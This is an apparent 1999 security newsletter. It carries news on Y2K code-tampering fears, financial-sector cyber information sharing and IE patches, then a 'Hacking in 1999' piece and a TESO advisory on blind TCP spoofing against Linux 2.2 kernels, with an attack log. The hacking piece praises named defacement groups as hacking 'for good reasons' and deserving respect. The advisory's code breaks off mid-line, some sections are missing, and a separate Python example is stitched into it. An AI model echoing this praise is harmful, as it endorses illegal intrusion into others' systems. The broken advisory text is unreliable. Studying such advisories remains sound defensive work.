He said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, Vatis said. The Senate Y2K Committee, in its final report last week, described the issue as "unsettling." "The effort to fix the code may well introduce serious long-term risks to the nation's security and information superiority," said the panel headed by Sens. Robert Bennett (R-Utah) and Chris Dodd (D-Connecticut).

Vatis, in testimony before the Y2K panel in July, warned that contractors could compromise systems by installing "trap doors" for anonymous access. By implanting malicious code, he said, a contractor could stitch in a "logic bomb" or a time-delayed virus that would later disrupt operations. Another possible threat is the insertion of a program that would compromise passwords or other system security, he said. The Senate Y2K Committee said the long-term consequences could include increased foreign intelligence collection and espionage activity, reduced information security, a loss of economic advantage, and increased infrastructure vulnerability.
Financial firms create Net crime watch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Treasury Department, major banks, and investment firms today inaugurated an Internet crime watch center that's intended to share confidential information on cyberthreats to the financial industry. The Financial Services Information Sharing and Analysis Center is intended to detect attacks from hackers and others on computer systems, and to provide rapid and anonymous notification between banks and other institutions when there is a threat. "New types of crime require new types of solutions," Treasury Secretary Lawrence Summers said.

Citigroup, Bank of America, Merrill Lynch, J.P. Morgan, and mutual fund giants Vanguard and Fidelity are among the program participants. The firms are prohibited from sharing confidential customer information. A survey by the Computer Security Institute found that 64 percent of the companies it questioned reported security breaches to computer systems in 1998, up from the number of firms reporting breaches in 1997, Summers said. "As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said. "We face a future, though, where criminals, terrorists, or even nation states may use the same tools in a more organized way for darker purposes."

President Bill Clinton, in an executive order issued in May 1998, directed the Treasury to pursue the project. The center itself is funded by the participating banks and financial institutions and managed by a private contractor. Other federal agencies are participating in the effort. "This is a step in the right direction," said Arthur Levitt, chairman of the Securities & Exchange Commission. "It's a whole new world in terms of security." The program will also help banks coordinate information during the Year 2000 computer rollover, according to Federal Reserve Governor Roger Ferguson. "The creation of the center couldn't come at a more opportune time," Ferguson said in a printed statement.

Last month, computer security product maker Network Associates warned that a computer virus that deletes a computer user's files was spreading through computer systems at major financial institutions. The bug, dubbed the "Thursday" virus, is programmed to delete files on December 13, 1999, Network Associates said. The virus attacks Microsoft Windows Word 97 files. Users won't know they are infected until December 13, the company said.

The problem isn't restricted to the financial industry or the United States. Just today, Electrabel, Belgium's biggest electricity company, said it successfully warded off an attempt by a computer hacker to infiltrate its system. Police are investigating the incident, which follows successful computer system break-ins in Belgium at Fortis Bank and at Belgacom's Skynet Internet service in August by a hacker who dubbed himself "Redattack."

SEC investigates NetRoadshow security breach
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yahoo's NetRoadshow unit discovered a security breach that could have let unauthorized Internet users see information about securities offerings, drawing questions from regulators about the cause of the problem. NetRoadshow is a pioneer in the business of using the Internet to broadcast sessions that companies hold for institutional investors before stock and bond offerings. Only financial institutions and other sophisticated investors with passwords are supposed to have access to the online meetings, known as roadshows. Until yesterday afternoon, however, anyone could view parts of sessions that the company has broadcast by entering the company's Web site through an Internet address that NetRoadshow's employees use to make technical changes to the site. The company said the problem was caused by human error.
About a dozen people had gotten into the system yesterday before NetRoadshow found out about the problem and blocked access, the company said. A Yahoo official said the company doesn't know how long the system had been open. "The problem was resolved immediately yesterday when we found out about it," said Yahoo spokeswoman Sherry Manno. "The breach occurred in our system that receives transferred files and is structured for internal use, not the system investors use."

The Securities and Exchange Commission, which lays out rules for companies issuing stock and limits the audience of both traditional face-to-face road shows and online sessions, said it learned about the security breach yesterday and plans to talk to NetRoadshow about the issue. "We're going to ask questions about what's going on," said SEC deputy corporation finance director Michael McAlevey. "If it was an inadvertent technical problem, it's less of a concern to us than if it was intentional."

SEC rules seek to prevent executives from hyping their business expectations before an offering or discussing the company beyond the information it has included in its prospectus, which is available to the public. The SEC allows road shows--where underwriters and issuers orally describe the company and try to build interest in the stock before pricing the offering--because they involve a limited audience of sophisticated investors.

The SEC gave its blessing to the Internet-transmitted road show in 1997, when the agency's staff sent "no action" letters to NetRoadshow and the MSNBC cable network, a joint venture of Microsoft and General Electric's NBC television network. They had requested approval to broadcast road shows over the Internet or via MSNBC's Private Financial Network. The SEC said it wouldn't recommend charges for transmitting the sessions over the Internet, though the agency reserved the right to look at the issue again in the future.
In the July 30, 1997, letter to NetRoadshow, the SEC said: "Since regulatory responses to legal issues raised by technological developments may evolve, you should be aware that this no-action position may be reevaluated in the future." NetRoadshow was acquired in March by Broadcast.com, which then was bought by Yahoo in July. Bloomberg, the parent of Bloomberg News, competes with NetRoadshow and several other firms in the business of transmitting road show presentations.

Court to revisit encryption ruling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A U.S. federal appeals court will reexamine a trial court's decision to lift U.S. government restrictions on the export of encryption technology. The 9th U.S. Circuit Court of Appeals withdrew a May decision by a panel of three of its judges, which had endorsed the trial court ruling. That indicates that a majority of the active 9th Circuit judges have reservations about the opinion or feel the encryption issue is significant enough to be revisited.

In May, the panel of 9th Circuit judges concluded that the federal government could not limit professor Daniel J. Bernstein's efforts to distribute encryption software. Many companies, such as Network Associates, have been prevented by U.S. law from selling data-scrambling technology overseas. Earlier this month, it was reported that the Clinton administration is easing restrictions on data-scrambling technology, clearing the way for Network Associates and other companies to sell the hardest-to-crack encryption technology.

Microsoft Patches IE Security.....Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Latest fix eliminates ways that site operators can control your PC.

Microsoft claims to have really done it this time. The company promises that it has completely eliminated the security problems that existed with Internet Explorer with the release of an updated patch for the browser software.
An initial patch announcement was made on September 10, but the patch available as of late last week is more far-reaching, Microsoft said in a statement posted Friday on its security Web site. The security holes in Internet Explorer were discovered earlier this month.

The patch eliminates the "ImportExportFavorites" vulnerability, which affected computers connected to the Internet, Microsoft says. The security hole made it possible for a Web site operator to carry out any functions that visitors to a Web site could do on their own computers, such as deleting or modifying files or reformatting the hard drive. It derived from a feature in IE 5 that lets users export a list of their favorite Web sites to a file, or import a file with a list of favorite Web sites.

The new patch also plugs security holes that resulted from several ActiveX controls, Microsoft says. These existed both in versions 4.01 and 5 of Internet Explorer. The ActiveX weakness allowed hackers to manipulate programs on a user's computer when they visited a Web page or received e-mail via Microsoft's Outlook program.

Justice Dept. Funds Antihacking Campaign
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The Justice Department is trying to save children before they turn into hackers. With its $300,000 funding of the Cybercitizen Partnership, an awareness campaign coordinated by the Information Technology Association of America, the Justice Department assumes the unusual role of helping to educate budding Web users about how to be responsible, law-abiding surfers. The Cybercitizen Partnership, announced in March, is a joint Justice-ITAA effort aimed at protecting the country's Internet infrastructure from outlaw hackers and other criminals. Faced with a security breach, law enforcement officials don't know at first if they're confronting a foreign terrorist, a college student or a couple of sixth-graders who are having some fun with Dad's computer.
But an ITAA official said that, upon investigation, a surprising number of cases involve child hackers. The association says that information technology makes up about 6 percent of the global gross domestic product, some $1.8 trillion of electronic infrastructure that needs to be protected against disgruntled former employees, corporate spies and juvenile delinquents who like to pull pranks. Figuring that it's too late to reform terrorists and spies, the ITAA decided to concentrate on the kids.

The campaign, which debuts in January, will initially target children 12 and under, aiming to teach them proper online behavior and to instill a healthy disdain for hacking. The association wants to "help weed out some of the less meaningful system violations by curious children so that law enforcement can focus on the true criminals," says ITAA President Harris Miller. The cash infusion from the Justice Department is in keeping with a long tradition of government-sponsored public education campaigns, from the Interior Department's Smokey the Bear messages against forest fires to the Drug Enforcement Administration's "Just Say No" war on drugs.

Miller says the campaign could be expanded to educate kids about other aspects of proper Internet etiquette, such as warning them against sending spam (for kids, the modern-day equivalent of prank telephone calls) or visiting Web sites with adult content. The main focus of the campaign, however, will be to "send the message that hacking isn't cute, clever or funny."

In addition to the funding from Justice, the ITAA also plans to pass the hat among its own membership, a who's-who list of the high-tech industry that includes Microsoft (MSFT), America Online (AOL) and IBM (IBM). The association will also seek funds from foundations and possibly from private individuals.
The association has sent out a request to several public relations companies for ideas on how to run the campaign, which might include television and Internet advertising, brochures and even visits to schools. One possibility under consideration: the creation of a mascot, like the famous McGruff crime dog, to pass the message along in a friendly manner.

Quantum confidential
~~~~~~~~~~~~~~~~~~~~

Want to beat the hackers once and for all? As Simon Singh finds out, the enigmatic quantum world is about to make your secrets safe as houses.

IT COULD HAPPEN in a few months or a few years. But sooner or later, a mathematician could make a discovery that jeopardises international security, threatens the future of Internet commerce, and imperils the privacy of e-mails. Today's codes and ciphers are good, to be sure. But it is probably only a matter of time before they become useless.

With the coming of the information age, we rely ever more heavily on cryptography to protect us from snoopers, cyber-crooks and Big Brother. Some of today's most secure codes exploit the fact that while it is easy to multiply two prime numbers together, it is almost impossible to start with the answer and work out which two primes were used to create it. But the day a mathematical genius discovers a short cut for finding the hidden prime numbers, these codes will crumble.

What everyone is looking for is a new form of code, one that is truly unbreakable. That's where the quantum world comes in. Exploiting the strange uncertainties of quantum physics can give you a code that nobody--no matter how clever--will ever be able to crack. That's the theory. The trouble comes when you try putting it into practice. When quantum particles interact with the large-scale world they tend to lose the delicate information they contain. This makes it fiendishly difficult to use them to send information over any sensible distance. Difficult, but not impossible.
In the past few years, researchers have succeeded in sending quantum-encrypted messages tens of kilometres down optical fibres. Now the challenge is to find a way to send quantum-encrypted information through the air. This will open the way to fully secure global communications, beamed up to an orbiting satellite and forwarded to any place on Earth. It's a phenomenal technical problem, but this year researchers at the Los Alamos National Laboratory in New Mexico achieved a breakthrough that looks set to transform the way we keep our secrets.

Online Credit Card Security Fears Waning, But Still a Factor
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A new report by Forrester Research, Inc. found that despite growing consumer comfort with online credit purchasing, the fear of using plastic on the Internet is still the largest obstacle to e-commerce. According to the report, consumer worries about credit card security have been dropping since early 1998. Forrester examined this trend through three surveys: 120,000 households interviewed in early 1998, 95,000 households in early 1999 and 10,000 online households in July 1999.

Consumer Concern Has Fallen

In 1998, just 15 percent of online households felt safe using their credit cards for online purchases. In the most recent study, this number rose to 53 percent. Furthermore, the percentage of consumers who feel that the Internet is not a secure place to use a credit card has plummeted from 71 to 40 percent. The survey also found that the longer consumers are online, the more comfortable they become with credit card security. However, this fact alone doesn't explain the waning security fears: 71 percent of consumers who were online for 6 to 12 months in January 1999 felt insecure using credit cards via the Internet. By July, this percentage dropped by 53 percent for consumers who were online for the same length of time.
Security Fears Still Choke E-Commerce

While security fears plummet, Forrester's survey found that 83 percent of consumers who have never shopped online still cite concerns over credit card security as the main reason for not buying online. According to Forrester, these consumers are driven by a fear of technology snafus and untrustworthy e-tailers. The primary worry is that credit card information can be stolen during transmissions from a PC to an e-tailer. Additionally, 79 percent of those surveyed said that they didn't trust online merchants to safeguard this information -- while 53 percent feared giving their card numbers to e-tailers with no brick-and-mortar presence. Nonetheless, general apprehension or bad experiences aren't entirely to blame. Forrester discovered that just 25 percent of skeptics say that they are generally wary when using a credit card for any type of purchase. A small group -- 4 percent -- points to a prior bad experience as the reason for not buying online.

How Can It Be Fixed?

Forrester asked reluctant consumers to identify what would make them more likely to use their credit cards online. After reviewing their answers, Forrester has come up with four ways that e-tailers can lessen consumers' reluctance to shop online: Seventy-five percent of the skeptics say that knowing they were using a "secure server site" would make them feel more comfortable. In addition, 48 percent would feel better if e-tailers also had some sort of brick-and-mortar presence to make returns easy. Forty-one percent of those surveyed by Forrester said that they would like to see online merchants adopt a money-back guarantee before they would be willing to use their credit cards online. Finally, 45 percent of the consumers interviewed said that their fears would be eased if e-tailers displayed positive testimonials from satisfied customers on their Web sites.

India: Code-Smuggling? Absurd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Indian officials Friday slammed as ridiculous a suggestion by US officials that Indian Y2K (Year 2000) software firms could have been used to smuggle in computer codes aimed at threatening Washington's security. Michael Vatis, the top cyber cop in the Federal Bureau of Investigation, told Reuters Thursday that malicious code changes under the guise of Y2K modifications had begun to surface in some US work undertaken by foreign contractors. The claim signaled possible economic and security threats. Vatis, who heads the National Infrastructure Protection Center (NIPC), gave no details. But Terrill Maynard, a Central Intelligence Agency officer assigned to the NIPC, said in a recent article that India and Israel appeared to be the "most likely sources" of malicious code. The article appeared in the June issue of Infrastructure Protection Digest.

"I think this is an utterly ridiculous assertion ... without, as far as I can see, any basis whatsoever," said Montek Singh Ahluwalia, chairman of the Indian government's Y2K Action Force. "I have no idea if this report is factually correct and if indeed a responsible officer has made what appears to be an irresponsible statement," Ahluwalia told Reuters. He said the Indian government had not received any official communication to suggest wrongdoing by Indian firms or agencies. The CIA declined to comment on Maynard's article. Referring to it, Vatis said: "This is our effort to put out in the public information that hopefully can be useful to people."

Indian firms have done more than $2 billion worth of coding work to protect old computers whose date-fields denoted years only by the last two digits. Unless rectified, such computers can cause valuable data crashes when the year 2000 dawns. India and Israel have had differences with the United States on security matters, particularly on nuclear policy.
Dewang Mehta, president of India's National Association of Software and Service Companies (NASSCOM), cited several reasons to dismiss suggestions Indian firms may be a security threat. He told Reuters that too much was at stake for India's booming software companies, which have used Y2K as a strategy to gain long-term clients. Besides, Indian firms did the bulk of Y2K work at US sites under client supervision, he added. "We cannot visualize that any moles have been planted. This is absurd. For us, too much is at stake," Mehta said. He said Indian firms had also carried out "regression testing," which was aimed at ensuring Y2K programming work did not hamper other software in client systems. Vatis said it was "quite easy" for an outsider to code in ways of gaining future access or causing something to "detonate" down the road. This could expose a company to future "denial of service attacks," open it to economic espionage, or leave it vulnerable to malicious altering of data, he said. Vatis said that so far "not a great deal" of Y2K-related tampering had turned up. But a US Senate panel said last week that long-term consequences of using foreign firms for Y2K work could include more espionage and reduced information security. Mehta said he heard during a recent visit to Israel a rumor about a computer virus designed to wipe out Y2K solutions. "I am afraid as only three months are left and many American systems are not compliant, this kind of global rumor-mongering is beginning to happen," he said. We all think we should guard ourselves against it. NASSCOM strongly condemns such rumors." Maynard noted Ireland, Pakistan, and the Philippines among nations whose firms did significant Y2K repair. He said they were "least likely" to harm US systems but did not rule out threat possibilities. 2. S P E C I A L ~~~~~~~~~~~~~~~~~ 2. 
HACKING IN 1999 | THE CURRENT STATE OF HACKING
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Major Exploits released in 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In 1999, many things have happened. The Allaire Cold Fusion bug has been widely advertised and put to use; many servers were compromised by using it, and if you look at a lot of the website defacement mirror sites, almost all were done by the Cold Fusion method. Yet another easy bug was released in 1999 by the eEye Digital Security Team; this bug was for the Microsoft IIS server, and again many people have used this method to make a name for themselves. After looking at exploits like this, it makes you wonder what a hacker is these days. Someone who uses a web browser to hack remote systems? Or is a hacker still defined as it was originally? Hacking is mostly about gaining access to a remote system, not showing off that you outsmarted an admin.

Major Incidents that have Affected the 'Scene'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The first major incident was the busting of Eric Burns AKA Zyklon, when companies pressed lawsuits against him for thousands of dollars because he broke into their servers. Up to now he is still not allowed to touch a computer, I assume.

The second incident was the raiding of members of the well known group gH a.k.a. global Hell. Approximately 19 people were raided, if not more, not only from gH but from other groups such as Level Seven, team spl0it, milw0rm and IL (Iron Lungs) from HcV/Legion2000 and forpaxe.

Kevin Mitnick was screwed around 2+ times, with them changing his court date continuously, and he now owes 1 mil. Read more about it at 2600; also support the FREE KEVIN movement.

Just recently, a few incidents have happened as a result of John Vranesevich, otherwise known as JP from AntiOnline.
First, Attrition makes a good accusation that JP indeed funded a hacker known as 'so1o' to deface the Senate Government website for him just to make a breaking news story (although I am not accusing him of doing this, because it was never proven). Another thing you notice about the "Anti Network" is the AntiCode website, which claims to be "the only place you need" for all of your exploits/network/security tools and utilities. But in reality this site is nothing more than an archive compiled from other known sites and code ripped by AntiOnline itself.

The second MAJOR incident was when JP shut down a popular IRC server. And the third, probably the most devastating to the underground community, was when JP caused Packetstorm Security to shut down; all of Ken Williams' files were deleted forever, his work ruined. Not to mention many other things. You can read all those other things at :

A few conventions have passed, such as Defcon. Defcon is probably the most recognized of all hacker conventions, and this year some major things happened at this convention: they had a line-up of great speakers, Carolyn P. Meinel showed up and was not allowed in because she was accused of not being a 'real' reporter (which I will not comment on), and shortly into the Defcon convention, their website was defaced by the very well known coding group ADM. Also Rootfest and the Blackhat Briefings have recently passed by.

Who has shown up?
~~~~~~~~~~~~~~~~~~

Many new groups and individuals have shown up in 1999 up to now. To mention a few, and give a decent description of them and their actions and skills:

Groups :
~~~~~~~

* Forpaxe - Forpaxe showed up in early 99; they have been responsible for hitting a record number of .edu domains, also quite a few .gov/.mil and numerous others. They are well known to all hackers and media. A member of the past groups Legion2000 and HcV, Iron Lungs, was a part of this group in the beginning and later got raided by the FBI.
Now it appears to be just 2 individuals (m1crochip/in0de), which they state on all of their webpage defacements. They do what they do for a reason, so they are a decent group of individuals as far as I am concerned.
Mirrors of their Website Defacements

* Goat Security - This organization is a definite mentionable; everybody knows and remembers the goat team. It consisted of members of gH, HcV and I think even a few from LoU. They defaced a good amount of websites and made a widely known name for themselves. They definitely knew what they were doing, not like all of the CF (Cold Fusion) kiddies you see around these days.
Mirrors of their Website Defacements

* gH (global Hell) - Possibly the most widely known hacker group worldwide and the most media exposed. gH defaced a lot of high profile websites such as Macweek, Peoples Court, the main Army page and the Whitehouse. Many members were later raided by FBI agents due to the defacing of the Whitehouse website. They have skill and, as far as I saw it, a very good team of people. This group will always be remembered.
Mirrors of their Website Defacements

* Level Seven - This crew was responsible for numerous defacements. It is rumored, and stated on some of their defacements, that members of this group were a part of gH (global Hell) and got raided. This group was another group that hacked for a decent reason. Mentionable mostly because of their tie-ins with gH. Nonetheless they are a good group.
Mirrors of their Website Defacements

* Stonehenge Crew - Not very much to say about this group other than they have a purpose for what they do. They always have a reason for defacing a website they hit. They have done around 14 webpage defacements. It is rumored they are also 'tight' with the known group gH. This is another good group.
Mirrors of their Website Defacements

* Keebler Elves - Well, this group is probably the most skilled up to now in 1999. Many skilled individuals, coders and hackers alike, are in it, from what is said at least.
They are best known for their hacks of the Department of Education, Virgin Records and the Monmouth Army Base. Probably has done the most recognized sites in 1999, and I wouldn't be surprised if they continue to hack big time names. This group deserves a lot of respect. Why? Because they aren't like the rest.
Mirrors of their Website Defacements

* HFD (Hacking for Drunks) - This is another group well known for its choice of sites to deface. Probably most well recognized for their 20th Century Fox International, Gibson and Blair Witch website hacks. They seem to have a good sense of humor and have done some entertaining defacements. Very good group. But the name/logo is kind of ripped from HFG (Hacking For Girls).
Mirrors of their Website Defacements

* bl0w team - A good Brazilian hackers group, consisting of 5 individuals, best noted for their 2600.co.uk and Telemar hacks. They do it all for an adequate reason and do not give up. I think their patriotism is admirable. They also seem to have a good amount of skill dealing with Solaris/NT systems.
Mirrors of their Website Defacements

* INDIANHackers/EHA/Ant1 S3cur1ty Taskf0rc3/MST (Moscow Security Team) - Nothing special, not really even worth the time; they did a 'few' sites and were never heard from again. None of them had really any reason for defacing websites other than to make themselves look big. Ant1 S3cur1ty Taskf0rc3 did a few with reason, but it was rare with these 4 groups.
Mirrors of all the groups' defacements : INDIANHackers ] EHA ] Ant1 s3cur1ty taskf0rce ] MST ]

-end-

Individuals :
~~~~~~~~~~~

* zo0mer - Hit a lot of government/military systems and banks. But it appears he removes data from the boxes after he is done. What would be labeled a malicious script kiddie cracker.
Mirror of all his/her hacks

* p0gO - Probably best known for his defacing of Time Warner San Diego, not to mention his mass hack. He appears to have good skills, and is also recognized for his association with irc.psychic.com.
Mirror of all his/her hacks

* Xoloth1 - Well known hacker from the Netherlands. Hit some well known porn sites and what would appear to be his spotlight defacement, Pentagon.co.yu. Xoloth hacks for all the right reasons.
Mirror of all his/her hacks

* v00d00 - First showed up on the scene doing a hack for Psychic, shortly after doing defacements when he was part of the group Defiance, it appears. He appears to hack for the freedom of Kevin Mitnick AKA Condor and against war, racism and a lot of the problems that happen in the world these days. He does it for a good cause. That is all there is to say.
Mirror of all his/her hacks

* Mozy - Started hacking for irc.psychic.com, later went individual; noted to be good friends with several known hackers. His defacements are quite humorous if you ask me. Keep it up.
Mirror of all his/her hacks

* dr_fdisk^ - Extremely well known Spanish hacker, and for being in the group Raza Mexicana. Most well known for compromising such sites as Nic.bo and HBO, Latin America. Another hacker that does it for the freedom of Kevin Mitnick and many other reasons.
Mirror of all his/her hacks

There are other individuals I missed and they all deserve respect and to be noticed. I didn't forget them because I dislike them, just because this part of the article has gone far enough.

What was hit?
~~~~~~~~~~~~

Aside from all the no-name sites that were hacked, in 1999 there have been several HIGH PROFILE web defacements. Below is a list with a link to the defaced site, provided by Attrition.

* Ku Klux Klan
* LOD Communication
* 200cigarettes Movie
* Whitepride
* No Limit Records
* Hotbot Search Engine
* Summercon
* eBay
* Coca Cola (BE)
* US Senate
* HBO, Latin America
* The White House
* Army Main Site

and so many more....

Why do they do it?
~~~~~~~~~~~~~~~~~~

MOST of the time it is to make a name and become known/noticed, but on some occasions people do it for a reason: to prove faulty security, to protest against a certain problem in the world, or a personal dispute.

Well, that pretty much covers 1999. Most of the remembered parts up to now, anyways. Thanks a lot, I prefer to remain anonymous.

Sites to check out : Rootshell , Attrition , HNN and OSAll

Written by anonymous for HNS (www.net-security.org )

3. V U L N E R A B I L I T Y S
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Linux Kernel 2.2.x ISN Vulnerability
   - 1.1 Systems Affected
   - 1.2 Tests
   - 1.3 Impact
   - 1.4 Explanation
   - 1.5 Solution
   - 1.6 Acknowledgments
   - 1.7 Contact Information
   - 1.8 References
   - 1.9 Exploit

1. Linux Kernel 2.2.x ISN Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TESO Security Advisory
26/09/1999

Linux Kernel 2.2.x ISN Vulnerability

Summary:

A weakness within the TCP stack in Linux 2.2.x kernels has been discovered. The vulnerability makes it possible to "blind-spoof" TCP connections. It is therefore possible for an attacker to initiate a TCP connection from an arbitrary non-existing or unresponding IP source address, exploiting IP address based access control mechanisms. Linux 2.0.x kernels were tested against this attack and found not to be vulnerable in any case.

1.1 Systems Affected
~~~~~~~~~~~~~~~~~~~~

All systems running the kernel versions 2.2.x of the Linux operating system. Linux 2.3.x systems may be affected, too; we did not test these versions. In our test situations we noticed that it doesn't seem to matter whether the TCP syncookie functionality was enabled or not (enabled within the kernel and activated through the proc filesystem options).

1.2 Tests
~~~~~~~~~

This is the beginning of a log of a successfully mounted blind TCP spoofing attack against a Linux 2.2.12 system.
(tcpdump output formatted for better readability)

16:23:02.727540 attacker.522 > victim.ssh: S 446679473:446679473(0)
16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0)
16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473:446679473(0)
16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:03.014941 attacker.522 > victim.ssh: R 446679474:446679474(0)
16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:06.473192 11.11.11.11.522 > victim.ssh: . ack 3929855318
16:23:06.473427 victim.ssh > 11.11.11.11.522: R 3929855318:3929855318(0)
16:23:06.554958 11.11.11.11.522 > victim.ssh: . ack 3929855319
16:23:06.555119 victim.ssh > 11.11.11.11.522: R 3929855319:3929855319(0)
16:23:06.637731 11.11.11.11.522 > victim.ssh: . ack 3929855320
16:23:06.637909 victim.ssh > 11.11.11.11.522: R 3929855320:3929855320(0)
...

The first ISN of the victim's host is 3929852318, which is within a SYN/ACK packet to the attacker's host. This is unspoofed and can be easily snagged by the attacker. At the same time the attacker sent out the first unspoofed SYN packet, he sent a spoofed SYN packet from 11.11.11.11 too. This packet is answered by the victim's host too, with the ISN of 3929859164. The difference between the first visible ISN and the second ISN is only (3929859164 - 3929852318) = 6846.

Please notice that all TCP and IP parameters of the spoofed packet, except for the IP source address, are the same as those of the unspoofed packet. This is important (see below).

This small difference within the initial TCP sequence number (ISN) is exploitable. In other tests, where both hosts were unlagged, we even had differences below 500 sometimes. We've managed to successfully blind spoof TCP connections on different Linux 2.2.x systems, that is, reaching the TCP "ESTABLISHED" state without being able to sniff the victim host.
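To put a number on what the log above shows, here is an added example (not part of the TESO advisory) that parses tcpdump SYN lines like those above, keeps the first ISN the victim handed to each peer, and reports how far apart consecutive ISNs landed; the function names, the `window` threshold and the re-typed sample log are this example's own assumptions.

```python
"""Added example: measure how far apart a host's TCP initial sequence numbers
land, from tcpdump-style SYN lines. A small gap between the ISNs handed to two
different peers is what lets an off-path sender guess a value it never saw."""
import re
from typing import Dict, List, Tuple

# Constructed sample: the SYN and SYN/ACK lines of the advisory's log, re-typed
# here as offline test input (the ack/RST probe lines are left out; the parser
# skips anything that is not a SYN anyway).
SAMPLE_LOG = """\
16:23:02.727540 attacker.522 > victim.ssh: S 446679473:446679473(0)
16:23:02.728371 victim.ssh > attacker.522: S 3929852318:3929852318(0)
16:23:02.734448 11.11.11.11.522 > victim.ssh: S 446679473:446679473(0)
16:23:02.734599 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
16:23:03.014941 attacker.522 > victim.ssh: R 446679474:446679474(0)
16:23:05.983368 victim.ssh > 11.11.11.11.522: S 3929859164:3929859164(0)
"""

# "HH:MM:SS.usec src > dst: S isn:isn(len)"; stray spaces around ':' tolerated.
SYN_RE = re.compile(
    r"^(\d+):(\d+):(\d+(?:\.\d+)?)\s+(\S+?)\s*>\s*(\S+?)\s*:\s+S\s+(\d+)\s*:"
)

Sample = Tuple[float, str, int]  # (seconds since midnight, peer, ISN)


def parse_syns(log: str) -> List[Tuple[float, str, str, int]]:
    """(time, src, dst, isn) for every SYN line; non-SYN lines are skipped."""
    out = []
    for line in log.splitlines():
        m = SYN_RE.match(line.strip())
        if m:
            h, mi, s, src, dst, isn = m.groups()
            out.append((int(h) * 3600 + int(mi) * 60 + float(s), src, dst, int(isn)))
    return out


def isns_chosen_by(log: str, host: str) -> List[Sample]:
    """The first ISN `host` picked for each peer, in time order. A retransmitted
    SYN/ACK (same peer, same ISN) is not a fresh sample and is dropped."""
    first: Dict[str, Sample] = {}
    for t, src, dst, isn in parse_syns(log):
        if src.rsplit(".", 1)[0] == host and dst not in first:
            first[dst] = (t, dst, isn)
    return sorted(first.values())


def isn_deltas(samples: List[Sample]) -> List[Tuple[int, float]]:
    """Consecutive (ISN gap mod 2^32, elapsed seconds) between samples."""
    return [((i1 - i0) % (1 << 32), round(t1 - t0, 6))
            for (t0, _, i0), (t1, _, i1) in zip(samples, samples[1:])]


def isn_predictable(deltas: List[Tuple[int, float]], window: int = 1 << 16) -> bool:
    """True when some fresh ISN landed within `window` of the previous one.
    The log above shows why that matters: having seen 3929852318, the prober
    only had to walk a few thousand ACK values to reach the ISN it never saw."""
    return any(gap <= window for gap, _ in deltas)


if __name__ == "__main__":
    samples = isns_chosen_by(SAMPLE_LOG, "victim")
    for (gap, dt), (_, peer, isn) in zip(isn_deltas(samples), samples[1:]):
        print(f"{peer}: ISN {isn}, +{gap} after {dt:.6f}s")
    print("predictable" if isn_predictable(isn_deltas(samples)) else "looks random")
```

Fed a capture of your own host's SYN/ACKs to several peers, the same functions tell you whether its ISNs cluster like the 6846 above or spread over the 32-bit space.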
1.3 Impact
~~~~~~~~~~

By sending packets from a trusted source address, attackers could possibly bypass address based authentication and security mechanisms. There have been similar exploitation techniques in the past, aimed especially at r* and NFS services, that demonstrated the security impact of weak ISNs very well. We have written a working exploit to demonstrate the weakness.

1.4 Explanation
~~~~~~~~~~~~~~~

The problem relies on an implementation flaw within the random ISN algorithm in the Linux kernel. The problem is within drivers/char/random.c, line 1684:

__u32 secure_tcp_sequence_number(__u32 saddr, __u32 daddr,
                                 __u16 sport, __u16 dport)
{
        ...
        static __u32 secret[12];
        ...
        secret[0]=saddr;
        secret[1]=daddr;
        secret[2]=(sport << 16) + dport;

        seq = (halfMD4Transform(secret+8, secret) & ((1<

S. Krahmer

This advisory has been written by typo and scut. The tests and further analysis were done by stealth and scut. The demonstration exploit has been written by S. Krahmer.

1.7 Contact Information
~~~~~~~~~~~~~~~~~~~~~~~

The teso crew can be reached by mailing to teso@shellcode.org. Our webpage is at

1.8 References
~~~~~~~~~~~~~~

[1] Mail to the Bugtraq mailing list
    From: Roy Hills
    Subject: NT Predictable Initial TCP Sequence numbers - changes observed with SP4
[2] Microsoft Knowledge Database Article ID: Q192292 "Unpredictable TCP Sequence Numbers in SP4".
[3] libUSI++, a spoofing library
[4] TESO
[5] S. Krahmer

1.9 Exploit
~~~~~~~~~~~

We've created a working exploit to demonstrate the vulnerability. The exploit needs libUSI++ installed, which can be obtained through [3]. The exploit is available from either or

------

4. R E A D I N G M A T E R I A L
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Books:

- Mastering Network Security -

Do you need to secure your network? Here's the book that will help you implement and maintain effective network security, no matter what size your network is or which NOS you're using.
Packed with practical advice and indispensable information, this book systematically identifies the threats that your network faces and explains how to eliminate or minimize them. Covers all major network operating systems -- NT, NetWare, and Unix -- and all aspects of network security, from physical security of premises and equipment to anti-hacker countermeasures to setting up your own Virtual Private Networks. The CD includes evaluation and demonstration versions of commercial firewalls, intrusion detection software, and a complete security policy.

- Cisco IOS Network Security -

